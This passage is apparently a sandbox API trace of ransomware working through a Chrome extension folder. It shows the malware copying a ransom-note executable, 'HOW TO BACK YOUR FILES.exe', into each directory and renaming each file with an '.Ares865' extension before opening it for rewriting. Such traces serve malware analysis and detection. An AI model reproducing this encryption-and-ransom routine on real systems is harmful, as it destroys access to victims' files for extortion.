HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0" [0102.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.103] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.103] GetLastError () returned 0x0 [0102.103] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8401b790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e905c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e905c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.104] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.104] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.104] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="icon_128.png" | out: lpString1="icon_128.png") returned="icon_128.png" [0102.104] lstrlenW (lpString="icon_128.png") returned 12 [0102.104] lstrlenW (lpString="Ares865") returned 7 [0102.104] lstrcmpiW (lpString1="128.png", lpString2="Ares865") returned -1 [0102.104] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.Ares865") returned 147 [0102.104] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.ares865"), dwFlags=0x1) returned 1 [0102.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.106] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3399) returned 1 [0102.110] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="icon_16.png" | out: lpString1="icon_16.png") returned="icon_16.png" [0102.110] lstrlenW (lpString="icon_16.png") returned 11 [0102.110] lstrlenW (lpString="Ares865") returned 7 [0102.110] lstrcmpiW (lpString1="_16.png", lpString2="Ares865") returned -1 [0102.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.Ares865") returned 146 [0102.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.ares865"), dwFlags=0x1) returned 1 [0102.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=157) returned 1 [0102.115] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="main.html" | out: lpString1="main.html") returned="main.html" [0102.115] lstrlenW (lpString="main.html") returned 9 [0102.115] lstrlenW (lpString="Ares865") returned 7 [0102.115] lstrcmpiW (lpString1="in.html", lpString2="Ares865") returned 1 [0102.116] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.Ares865") returned 144 [0102.116] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.ares865"), dwFlags=0x1) returned 1 [0102.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92) returned 1 [0102.120] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="main.js" | out: lpString1="main.js") returned="main.js" [0102.120] lstrlenW (lpString="main.js") returned 7 [0102.121] lstrlenW (lpString="Ares865") returned 7 [0102.121] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.Ares865") returned 142 [0102.121] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.ares865"), dwFlags=0x1) returned 1 [0102.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.122] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95) returned 1 [0102.128] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0102.128] lstrlenW (lpString="manifest.json") returned 13 [0102.128] lstrlenW (lpString="Ares865") returned 7 [0102.128] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0102.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.Ares865") returned 148 [0102.128] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0102.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.129] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=726) returned 1 [0102.133] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_locales" | out: lpString1="_locales") returned="_locales" [0102.133] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_metadata" | out: lpString1="_metadata") returned="_metadata" [0102.133] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata" [0102.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata" [0102.133] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.133] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.134] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.134] GetLastError () returned 0x0 [0102.134] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x842481d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e905c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e905c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.135] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.135] lstrcpyW (in: lpString1=0x2cce512, lpString2="computed_hashes.json" | out: lpString1="computed_hashes.json") returned="computed_hashes.json" [0102.135] lstrlenW (lpString="computed_hashes.json") returned 20 [0102.135] lstrlenW (lpString="Ares865") returned 7 [0102.135] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.135] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.Ares865") returned 165 [0102.135] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.ares865"), dwFlags=0x1) returned 1 [0102.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=352) returned 1 [0102.141] lstrcpyW (in: lpString1=0x2cce512, lpString2="verified_contents.json" | out: lpString1="verified_contents.json") returned="verified_contents.json" [0102.141] lstrlenW (lpString="verified_contents.json") returned 22 [0102.141] lstrlenW (lpString="Ares865") returned 7 [0102.141] lstrcmpiW (lpString1="ts.json", lpString2="Ares865") returned 1 [0102.141] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.Ares865") returned 167 [0102.141] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0102.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.143] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11094) returned 1 [0102.146] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales" [0102.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales" [0102.147] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.147] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.147] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.148] GetLastError () returned 0x0 [0102.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.148] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8402f010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e92bd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e92bd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.148] lstrcpyW (in: lpString1=0x2cce510, lpString2="ar" | out: lpString1="ar") returned="ar" [0102.148] lstrcpyW (in: lpString1=0x2cce510, lpString2="bg" | out: lpString1="bg") returned="bg" [0102.148] lstrcpyW (in: lpString1=0x2cce510, lpString2="ca" | out: lpString1="ca") returned="ca" [0102.148] lstrcpyW (in: lpString1=0x2cce510, lpString2="cs" | out: lpString1="cs") returned="cs" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="da" | out: lpString1="da") returned="da" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="de" | out: lpString1="de") returned="de" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="el" | out: lpString1="el") returned="el" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="en_GB" | out: lpString1="en_GB") returned="en_GB" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="en_US" | out: lpString1="en_US") returned="en_US" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="es" | out: lpString1="es") returned="es" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="es_419" | out: lpString1="es_419") returned="es_419" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="et" | out: lpString1="et") returned="et" [0102.149] lstrcpyW (in: lpString1=0x2cce510, lpString2="fi" | out: lpString1="fi") returned="fi" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="fil" | out: lpString1="fil") returned="fil" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="fr" | out: lpString1="fr") returned="fr" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="he" | out: lpString1="he") returned="he" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="hi" | out: lpString1="hi") returned="hi" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="hu" | out: lpString1="hu") returned="hu" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="id" | out: lpString1="id") returned="id" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="it" | out: lpString1="it") returned="it" [0102.150] lstrcpyW (in: lpString1=0x2cce510, lpString2="ja" | out: lpString1="ja") returned="ja" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="ko" | out: lpString1="ko") returned="ko" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="lt" | out: lpString1="lt") returned="lt" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="lv" | out: lpString1="lv") returned="lv" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="ms" | out: lpString1="ms") returned="ms" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="nl" | out: lpString1="nl") returned="nl" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="no" | out: lpString1="no") returned="no" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="pl" | out: lpString1="pl") returned="pl" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_BR" | out: lpString1="pt_BR") returned="pt_BR" [0102.151] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_PT" | out: lpString1="pt_PT") returned="pt_PT" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="ro" | out: lpString1="ro") returned="ro" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="ru" | out: lpString1="ru") returned="ru" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="sk" | out: lpString1="sk") returned="sk" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="sl" | out: lpString1="sl") returned="sl" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="sr" | out: lpString1="sr") returned="sr" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="sv" | out: lpString1="sv") returned="sv" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="th" | out: lpString1="th") returned="th" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="tr" | out: lpString1="tr") returned="tr" [0102.152] lstrcpyW (in: lpString1=0x2cce510, lpString2="uk" | out: lpString1="uk") returned="uk" 